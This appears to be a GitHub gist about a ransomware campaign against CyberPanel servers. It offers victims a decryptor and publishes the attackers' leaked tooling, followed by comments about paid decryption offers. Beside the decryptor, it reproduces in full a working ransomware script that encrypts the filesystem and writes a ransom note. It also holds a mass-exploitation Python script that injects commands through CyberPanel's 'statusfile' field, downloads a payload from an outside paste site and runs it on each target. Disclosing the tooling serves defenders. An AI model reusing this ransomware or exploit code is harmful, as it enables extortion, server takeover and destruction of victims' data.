Skip to content

Instantly share code, notes, and snippets.

@gboddin
Last active November 15, 2024 20:28
Show Gist options
  • Save gboddin/d78823245b518edd54bfc2301c5f8882 to your computer and use it in GitHub Desktop.
Save gboddin/d78823245b518edd54bfc2301c5f8882 to your computer and use it in GitHub Desktop.
cyberpanel 0day leaked attack script

CyberPanel ransomware attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 3 things:

  • A decryption script for .psaux ransoms
  • A link to a decryptor for .encrypt ransoms
  • A list of files found on the PSAUX attack server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extension they leave are:

  • .psaux -> Custom ransomware, script based, decryptor available
  • .encryp -> Variant from Babuk's source, decryptor available
  • .locked -> C3RB3R Conti v3-based Ransomware, decryptor status unknown

Decryption

If your server was only targeted by PSAUX and files have the .psaux extension, due to a flaw in PSAUX's implementation, you should be able to use the decrypter 1-decrypt.sh

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.

#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter #
# #
# You have been blessed by PSAUX #
# #
# All your files can be decrypted. #
# #
# #
# Telegram: @psauxsec #
# #
# Fun must be made on that channel for weak crypto, #
# #
# Ransomware Rushed by PSAUX #
# #
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX
MASTER_KEY="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$MASTER_KEY" > /tmp/private.pem
MASTER_KEY_PATH="/tmp/private.pem"
# Decrypt the encryption key with the master key
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc
local_key=$(cat /tmp/key.enc|xxd -p)
local_iv=$(cat /tmp/iv.enc|xxd -p)
echo "Recovered key: $local_key IV: $local_iv"
# Find all psaux file and decrypt them
find / -name "*.psaux" -type f|while read file; do
openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
echo "Restored ${file%\.psaux}"
done
#!/usr/bin/env bash
private="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
echo "Private key not found at $PRIVATE_KEY_PATH"
exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
echo "Could not read the private key (maybe permission issue?)"
exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
echo "Key encrypted successfully: /var/key.enc"
else
echo "Error with key encryption"
exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
echo "IV encrypted successfully: /var/iv.enc"
else
echo "Error with IV encryption"
exit 1
fi
excluded_dirs=(
"/proc"
"/sys"
"/dev"
"/run"
"/etc"
"/usr"
"/tmp"
"/var/run"
"/var/lock"
"/var/tmp"
"/mnt"
"/sbin"
"/lib64"
"/bin"
"/boot"
"/lib"
"/lib32"
"/srv"
"/libx32"
"/media"
"/lost+found"
)
excluded_files=(
"/var/key.enc"
"/var/iv.enc"
"/var/decrypter.sh"
"/var/index_template.html"
)
is_excluded() {
local path=$1
for excluded in "${excluded_dirs[@]}"; do
if [[ "$path" == "$excluded"* ]]; then
return 0
fi
done
for excluded in "${excluded_files[@]}"; do
if [[ "$path" == "$excluded" ]]; then
return 0
fi
done
return 1
}
encrypt_directory() {
local dir=$1
echo "Encrypting directory: $dir"
find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "Encrypting file: $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
}
encrypt_directory "/"
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
if ! is_excluded "$dir"; then
cp /var/index_template.html "$dir/index.html"
fi
done
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "[+] : $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
rm -- "$0" && exit 0
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
def get_CSRF_token(client):
try:
resp = client.get("/")
if resp.status_code == 200:
return resp.cookies.get('csrftoken')
else:
print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
return None
except httpx.RequestError:
print(f"Failed to connect to {client.base_url}")
return None
def pwn(client, CSRF_token, cmd):
if not CSRF_token:
return "No CSRF token"
headers = {
"X-CSRFToken": CSRF_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
try:
response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
if response.headers.get("Content-Type", "").startswith("application/json"):
return response.json().get("requestStatus", "No response")
else:
print(f"Unexpected response type from {client.base_url}: {response.text}")
return "Unexpected response"
except httpx.RequestError:
return "Failed to execute"
def execute_command(client, command):
CSRF_token = get_CSRF_token(client)
if not CSRF_token:
print(f"Could not retrieve CSRF token from {client.base_url}")
return "Failed to retrieve CSRF token"
print(f"Executing: {command} on {client.base_url}")
stdout = pwn(client, CSRF_token, command)
print(stdout)
return stdout
def process_target(target):
print(f"Processing target: {target}")
try:
client = httpx.Client(base_url=target, verify=False, timeout=5.0)
# Step 1: Download the file
if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
return
# Step 2: Check if the file exists, retry if necessary
file_exists = False
while not file_exists:
response = execute_command(client, "ls /var/actually.sh")
if "No such file or directory" not in response:
file_exists = True
print("File found. Proceeding with further steps...")
else:
print("File not found. Waiting for the download to complete...")
time.sleep(2) # Wait for 2 seconds before checking again
# Step 3: Change permissions for the downloaded file
execute_command(client, "chmod +x /var/actually.sh")
# Step 4: Remove any carriage return issues
execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
# Step 5: Execute the script with nohup to detach and log to /dev/null
execute_command(client, "nohup /var/actually.sh")
print("Script executed and detached.")
except httpx.RequestError as e:
print(f"Could not connect to {target}. Error: {str(e)}")
def main(targets_file, max_threads=5):
try:
with open(targets_file, "r") as file:
targets = [line.strip() for line in file if line.strip()]
with ThreadPoolExecutor(max_threads) as executor:
future_to_target = {executor.submit(process_target, target): target for target in targets}
for future in as_completed(future_to_target):
target = future_to_target[future]
try:
future.result()
except Exception as exc:
print(f"{target} generated an exception: {exc}")
except FileNotFoundError:
print(f"Error: File {targets_file} not found.")
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 ak48.py targets.txt [max_threads]")
sys.exit(1)
targets_file = sys.argv[1]
max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
main(targets_file, max_threads)
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
@exzept
Copy link

exzept commented Nov 13, 2024

https://t.me/RansomRescue they can't do anything, they're crooks.

@zapsjava
Copy link

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

so, You are saying that I can send you one file and you will decrypt it? how can I contact you and how much it costs for more than one file?

@exzept
Copy link

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

so, You are saying that I can send you one file and you will decrypt it? how can I contact you and how much it costs for more than one file?

you have this feature in your test reference file

@zjcboy
Copy link

zjcboy commented Nov 15, 2024

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

@exzept
Copy link

exzept commented Nov 15, 2024

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

what is the file extension?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment